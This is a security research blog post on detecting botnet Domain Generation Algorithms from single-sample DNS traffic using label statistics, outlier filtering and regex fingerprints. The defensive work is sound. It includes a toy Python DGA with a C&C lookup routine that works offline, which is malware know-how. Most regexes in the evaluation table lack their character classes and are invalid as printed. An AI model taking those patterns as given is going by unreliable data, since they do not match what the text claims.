Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most modern botnets use _Domain Generation Algorithms_ (DGA) to generate and register many different domains for their _Command-and-Control_ (C&C) server in order to defend it from takeovers and blacklisting attempts. To improve the automated analysis of DGA-based malware, we have developed an analysis system for the detection and classification of DGAs. In this blog post we present and discuss several techniques used in our DGA classifier. DGA detection can be useful to detect DGA-based malware. With DGA classification it is also possible to see links between different malware samples of the same family. Such a classification is expressed as a description of the DGA in the form of a regex. Moreover, our analysis methods are based on the network traffic of single samples and not of a whole system or network, which distinguishes them from most of the related work.

DGA-BASED BOTNETS

A _Domain Generation Algorithm_ (DGA) periodically generates a large number of pseudo-random domains that resolve to a C&C server of a botnet. The main reason a botnet owner uses one is that it greatly complicates a takeover by authorities (sinkholing). In a typical botnet infrastructure that uses a static domain for the C&C server, authorities could take over the botnet in cooperation with the corresponding domain registrar by changing the settings of the static C&C domain (e.g. changing the DNS records).

[Figure: Typical infrastructure of a botnet]

With a DGA that dynamically generates domains which resolve to the C&C server, effective sinkholing is no longer possible. Since the bots use a newly generated domain after every period to connect to the C&C server, it would be pointless to take control of a domain that the bots no longer use to connect to the C&C server.

[Figure: Typical infrastructure of a DGA botnet]

The C&C server and the bots use the same DGA with the same seed, so that they are able to generate the same set of domains. DGAs mostly use the date as a seed to initialize the algorithm for domain generation. Hence the DGA creates a different set of domains every day it is run. To initialize a connection to the C&C server, the bot first needs to run the DGA to generate a domain that can also be generated on the side of the C&C server, since both are using the same algorithm and seed. After every domain generation, the bot attempts to resolve the generated domain. These steps are repeated until the domain resolution succeeds, so that the bot learns the current IP address of the corresponding C&C server. Through that DGA domain the bot can set up a connection to the C&C server.
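To make the shared-seed idea concrete, here is a deliberately simplified toy generator in Python. It is not the algorithm of any real malware family: the hashing scheme, the function names `toy_dga` and `find_c2`, the label length of 12, and the reserved `.example` TLD are all assumptions chosen for illustration. The resolver is passed in as a plain callable so the sketch runs entirely offline.

```python
import hashlib
from datetime import date


def toy_dga(seed_date, count=5, length=12, tld="example"):
    """Derive `count` pseudo-random domains from a date seed (toy example)."""
    domains = []
    for index in range(count):
        material = f"{seed_date.isoformat()}:{index}".encode()
        digest = hashlib.sha256(material).digest()  # 32 bytes, so length <= 32
        label = "".join(chr(ord("a") + byte % 26) for byte in digest[:length])
        domains.append(f"{label}.{tld}")
    return domains


def find_c2(domains, resolve):
    """Try each generated domain until `resolve` returns an address."""
    for domain in domains:
        address = resolve(domain)
        if address is not None:
            return domain, address
    return None


# Both sides run the same algorithm with the same seed and get the same list.
todays_domains = toy_dga(date(2017, 8, 30))
registered = {todays_domains[2]: "192.0.2.1"}  # operator registered one domain
print(find_c2(todays_domains, registered.get))
```

Because the list depends only on the algorithm and the date, a defender who has recovered the algorithm can compute the same list in advance, while the domains observed on one day say little about the domains used on the next.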

MOTIVATION

DGA detection can be very helpful to detect malware: if the usage of a DGA can be detected while analyzing the network traffic of a single sample, then it is very likely that the analyzed sample is malicious, since DGAs are commonly used by malware but not by benign software. DGA classification is the next step in the analysis after a DGA has been detected. A successful classification returns a proper description of a DGA. With such a unified description, it is possible to group malware using the same DGA. Being able to group malware by correlating characteristics improves the detection of new malware samples of these families. Therefore, the signatures of recently detected malware samples will be automatically blacklisted. The following figure shows, for non-DGA malware, that grouping malware families based on the same domains in their DNS request traffic is only possible if they all use the same static C&C domain:

[Figure: Two samples using the same static C&C domain]

If the malware uses a DGA, then the grouping of malware is no longer trivial, because generated DGA domains are only used temporarily; using those to find links between samples would not be very effective.

[Figure: Two samples with the same DGA but a different seed]

Note also that the domains occurring in the network traffic of a recently analyzed malware sample could differ if the same sample is analyzed on another day, since many DGAs use the date as a seed. The solution is to calculate a seed-independent DGA description for every analyzed sample using a DGA. That description can then be used as a bridge between malware samples using the same DGA.

[Figure: Pattern descriptor to abstract different DGA seeds]

To solve this problem, we have divided it into three smaller tasks. Thus, the DGA classifier is structured into three components. Each component solves a task that contributes to the result of the DGA classification.

In this blog post we concentrate only on approaches for DGA detection and classification that are automatable, since we want to analyze a very high number of samples. Furthermore, we want to avoid unnecessary network traffic as much as possible, therefore we focus only on offline methods.

DGA DETECTION

This approach for DGA detection is based on statistical values calculated over the relevant label attributes of the domains. Since the domains generated by a DGA mostly follow a pattern, it is very useful to calculate the standard deviation of some attribute values. For some attributes the average value can also be used to measure whether a domain is generated by a DGA or not. The same statistical values are also calculated over a list of domains from the _Top 500 Alexa Ranking_. These are considered as reference values for non-DGA domains regarding the relevant label attributes.

Domains with multiple levels are split into their labels for further analysis. E.g. this domain: _http://www.developers.google.com_ is split into:

_com_ – Top-level domain (TLD)
_google_ – Second-level domain
_developers_ – Third-level domain
_www_ – Fourth-level domain

All domains in the domain list resulting from a sample are compared level-wise, such that the labels of every domain are only compared with labels of the same level. To find proper indicators for DGA usage, we have done a level-wise comparison of statistical values calculated over several lexical properties of DGA domains and non-DGA domains (e.g. from the _Top 500 Alexa Ranking_).
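The level-wise split described above can be sketched in a few lines of Python. The helper names `split_levels` and `group_by_level` are hypothetical, and the sketch makes a simplifying assumption: every dot-separated label counts as one level, so multi-label public suffixes such as `co.uk` are not treated specially.

```python
from collections import defaultdict
from urllib.parse import urlsplit


def split_levels(domain):
    """Map level number (1 = TLD) to label, e.g. {1: 'com', 2: 'google', ...}."""
    host = urlsplit(domain).hostname if "://" in domain else domain
    labels = host.lower().rstrip(".").split(".")
    return {level: label for level, label in enumerate(reversed(labels), start=1)}


def group_by_level(domains):
    """Collect the labels of all domains per level for level-wise comparison."""
    levels = defaultdict(list)
    for domain in domains:
        for level, label in split_levels(domain).items():
            levels[level].append(label)
    return dict(levels)


print(split_levels("http://www.developers.google.com"))
# {1: 'com', 2: 'google', 3: 'developers', 4: 'www'}
```

Grouping by level means that statistics for, say, second-level labels are never mixed with those of TLDs or `www` prefixes.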

[Figure: Different kinds of DGA patterns]

Our experiments have shown that these statistical values over domain levels are very effective for DGA detection:

* Average of the . . .
  * number of used hyphens
  * maximum number of contiguous consonants
* Standard deviation of the . . .
  * string length of the label
  * consonant and vowel ratio
  * entropy
* Redundancy of substrings or words in case of a wordlist DGA

With all these arguments, we can build a score with a specific threshold. If the score exceeds the threshold, the component will decide that the analyzed domain list was generated by a DGA. Since the arguments are based on statistical values, which lose their significance with smaller sets, it is also important to consider the case with too few domains. In this case, the score is scaled down.

SEPARATION OF NON-DGA DOMAINS

Malware often tries to connect to a benign host (e.g. google.com) first to check its connectivity to the internet. So, in case of DGA-based malware, the samples do not only send requests to DGA domains, but also to non-DGA domains. Hence the program for DGA classification needs to expect a domain list containing DGA domains and non-DGA domains. Before the program can classify a DGA, it needs to filter out the non-DGA domains. In this process, we assume that the majority of the domains in the domain list of the sample are DGA domains. Therefore, the non-DGA domains are considered as outliers. We used different outlier methods to identify non-DGA domains:

* Outlying TLD-label
* Outlying www-label
* Find outliers with the method of Nalimov regarding the following label attributes:
  * String length of the label
  * Digit and string length ratio
  * Hyphen and string length ratio
  * Consonant and vowel ratio
* Outlying label count
* Find outliers by too few occurring values regarding the following label attributes (the more often a value occurs, the higher the probability that it belongs to a DGA domain. We use the opposite case to find non-DGA domains here):
  * String length of the label
  * Consonant and vowel ratio
  * Digit and string length ratio
  * Entropy
  * Hyphen and string length ratio
  * Relative position of the first hyphen in the label
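Both the detection score and the outlier filters above operate on per-label attributes. The following Python sketch shows one way such attributes and their level-wise statistics could be computed. It is an illustration under assumptions, not the classifier's implementation: the function names, the treatment of `y` as a consonant, the use of Shannon entropy over characters, and the population standard deviation are all choices made here, and labels are assumed to be non-empty ASCII strings.

```python
import math
import re
import statistics
from collections import Counter

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]+")  # 'y' counted as consonant


def shannon_entropy(label):
    """Character-level Shannon entropy of a label, in bits."""
    counts = Counter(label)
    total = len(label)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def label_features(label):
    """Lexical attributes of a single (non-empty) domain label."""
    label = label.lower()
    letters = [ch for ch in label if ch.isalpha()]
    vowels = sum(ch in VOWELS for ch in letters)
    consonants = len(letters) - vowels
    runs = CONSONANT_RUN.findall(label)
    return {
        "length": len(label),
        "hyphens": label.count("-"),
        "digit_ratio": sum(ch.isdigit() for ch in label) / len(label),
        "hyphen_ratio": label.count("-") / len(label),
        # Avoid division by zero for labels without vowels.
        "consonant_vowel_ratio": consonants / max(vowels, 1),
        "max_consonant_run": max((len(run) for run in runs), default=0),
        "entropy": shannon_entropy(label),
    }


def level_statistics(labels):
    """Averages and standard deviations over all labels of one domain level."""
    feats = [label_features(label) for label in labels]
    return {
        "mean_hyphens": statistics.mean([f["hyphens"] for f in feats]),
        "mean_max_consonant_run": statistics.mean([f["max_consonant_run"] for f in feats]),
        "stdev_length": statistics.pstdev([f["length"] for f in feats]),
        "stdev_consonant_vowel_ratio": statistics.pstdev([f["consonant_vowel_ratio"] for f in feats]),
        "stdev_entropy": statistics.pstdev([f["entropy"] for f in feats]),
    }
```

A list of labels that all have the same length yields a `stdev_length` of 0, which is the kind of regularity the detection score looks for. How the individual values are weighted into a score and which threshold is used is not specified in the post and is left open here.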

DGA CLASSIFICATION

After the separation of DGA domains from non-DGA domains, we start with the classification of the DGA. The classifier analyzes the list of DGA domains and creates a regex, as specific as possible, that matches all these DGA domains. If the separation is not completely successful, the program will continue with the classification based on DGA domains and non-DGA domains, which could lead to a wrong description of the DGA. But not every failing separation process causes a wrong classification. In some cases, if non-DGA domains cannot be differentiated from DGA domains regarding any domain attributes, the classification will still return the correct DGA description, since it covers only the relevant domain attributes. If the failing separation process causes a wrong DGA description, then the resulting wrong or imprecise DGA description can still be interpreted as a fingerprint calculated over the requested non-DGA domains and the DGA domains. That fingerprint is still useful to group malware of the same family, because it is very common that those requested non-DGA domains occur in other malware samples of the same family, too.

DGAs do not necessarily always generate the same set of domains, because in most cases the seed of the DGA is changed (usually the date is used as seed).

In the following picture, you can see that the calculated DGA regexes do not match because of the differing first letter, which seems to be seed-dependent in that case:

[Figure: DGA with seed-dependent first character]

An important requirement for the automatically generated DGA description is that it needs to be independent of the seed. Since, from our perspective, it is not possible to determine which part of a DGA domain is seed-dependent, we use an approach that tries to generalize the seed-dependent part of a domain. For this task, we use three layers of regexes that are hierarchically arranged:

* Layer 1: very generalized pseudo-regex
* Layer 2: generalized regex
* Layer 3: specific regex

All those regexes can be interpreted as DGA descriptions (calculated with only one sample) of the same DGA with different precision. Such a hierarchy could look like this:

[Figure: regex hierarchies for Tinba-DGA and Simda-DGA]
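As a rough illustration of what the most specific layer might look like, the Python sketch below derives a regex from a list of domains. It is a simplified stand-in, not the classifier described in this post: the function name `specific_regex` is hypothetical, only the first label is generalized (character class plus length range), everything after the first dot is treated as a literal suffix, and the more general layers are not modelled at all.

```python
import re


def specific_regex(domains):
    """Derive a simple regex (character class, length range, suffix list)
    that matches every domain in `domains`. Assumes ASCII host names."""
    if not domains:
        raise ValueError("need at least one domain")

    labels, suffixes = [], set()
    for domain in domains:
        label, _, suffix = domain.lower().partition(".")
        labels.append(label)
        suffixes.add(suffix)

    # Build the smallest character class that covers all observed labels.
    chars = set("".join(labels))
    char_class = ""
    if any(ch.isalpha() for ch in chars):
        char_class += "a-z"
    if any(ch.isdigit() for ch in chars):
        char_class += "0-9"
    if "-" in chars:
        char_class += "-"

    shortest = min(len(label) for label in labels)
    longest = max(len(label) for label in labels)
    quantifier = f"{{{shortest}}}" if shortest == longest else f"{{{shortest},{longest}}}"

    escaped = sorted(re.escape(suffix) for suffix in suffixes)
    suffix_part = escaped[0] if len(escaped) == 1 else "(" + "|".join(escaped) + ")"
    return f"[{char_class}]{quantifier}\\.{suffix_part}"


pattern = specific_regex(["abcdefghijkl.com", "mnopqrstuvwx.ru"])
print(pattern)  # [a-z]{12}\.(com|ru)
```

A seed-dependent constant character, like the differing first letter in the figure above, would need the more general layers to be abstracted away; this sketch sidesteps that by never emitting literal characters for the first label.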

EVALUATION

Out of 113,993 samples, the DGA classifier detects 782 DGA-based malware samples.

To determine the false positive rate, we manually reviewed the results of the analysis system. Regarding the DGA detection, we found 38 false positives in our result set. Hence we have a false positive rate that is lower than 0.049% (with the assumption that the DGA-based malware samples queried a relatively high number of different domains). A false negative evaluation is hard in this case, because the number of input samples is too high for manual evaluation. For an automatic false negative evaluation, the required ground truth of a large sample set is missing.

The following excerpt shows some specific DGA regexes from the DGA classification, which used 38,380 DGA-based malware samples as input:

Domain Fingerprint / Regex                Matches   Family name
{8}\.kuaibu8\.cn                          569       Razy
{3}y{3}\.com                              2082      simda
{11}\.eu                                  829       simda
{6,12}\.(com|info|net|org|dyndns\.org)    2047      Pykspa
{12}\.(com|in|net|ru)                     8508      tinba
{12}\.com                                 6296      tinba
{12}\.pw                                  7714      tinba
{12}\.(biz|pw|space|us)                   35        tinba
{12}\.(cc|com|info|net)                   17        tinba
{12}\.(com|in|net|ru)                     172       tinba
{12}\.(com|in|net|ru)                     110       tinba
{12}\.(com|in|net|ru)                     45        tinba
{12}\.(com|in|net|ru)                     110       tinba
{8}\.info                                 216       tinba
v{1}\.{7}\.ru                             77        Kryptik
v1\.{7}\.ru                               579
{7,11}\.(com|net)                         113
{8}\.{3}i{2}8\.cn                         114
{6,19}\.com                               644       Ramnit
{14,16}\.(biz|com|info|net|org)           173

It is conspicuous that the Tiny Banker Trojan (Tinba) occurs very often in the result set, with several different specific regexes. After generalizing most of the Tinba regexes, as described in section 2.3, it will be possible to group all samples with only one regex. The family names are missing where we could not automatically detect which malware family the samples using the DGA belong to.

CONCLUSION

The result shows that DGA detection and DGA classification can be very useful to detect new malware samples by their DGA. Hence it is also possible to find links between old and new malware samples of the same family via their classified DGA. The DGA detection seems to be very reliable for samples that have queried many different domains. Our implemented concept for DGA classification seems to be successful in many cases. However, there are still cases where the calculated DGA descriptions are not correct, because the created patterns are sometimes overfitted to the given domain lists or because non-DGA domains were considered in the calculation of the DGA descriptions, too. To contain this problem, we use a multi-layered regex generalization. Even wrong DGA descriptions can still be considered as fingerprints calculated over the domain list of the sample. Such a fingerprint can be used to classify the DGA-based malware, so that it still makes a good contribution to automated malware analysis.

LITERATURE

A. Zanker. Detection of outliers by means of Nalimov’s test – Chemical Engineering, 1984.
H. Zhang, M. Gharaibeh, S. Thanasoulas, C. Papadopoulos – Colorado State University, Fort Collins, CO, USA. BotDigger: Detecting DGA Bots in a Single Network, 2016.
R. Sharifnya and M. Abadi – Tarbiat Modares University Tehran, Iran. A Novel Reputation System to Detect DGA-Based Botnets, 2013.
T. Frosch, M. Kührer, T. Holz – Horst Görtz Institute (HGI), Ruhr-University Bochum, Germany. Predentifier: Detecting Botnet C&C Domains From Passive DNS Data, 2013.

Author Emanuel Durmaz. Posted on August 30, 2017
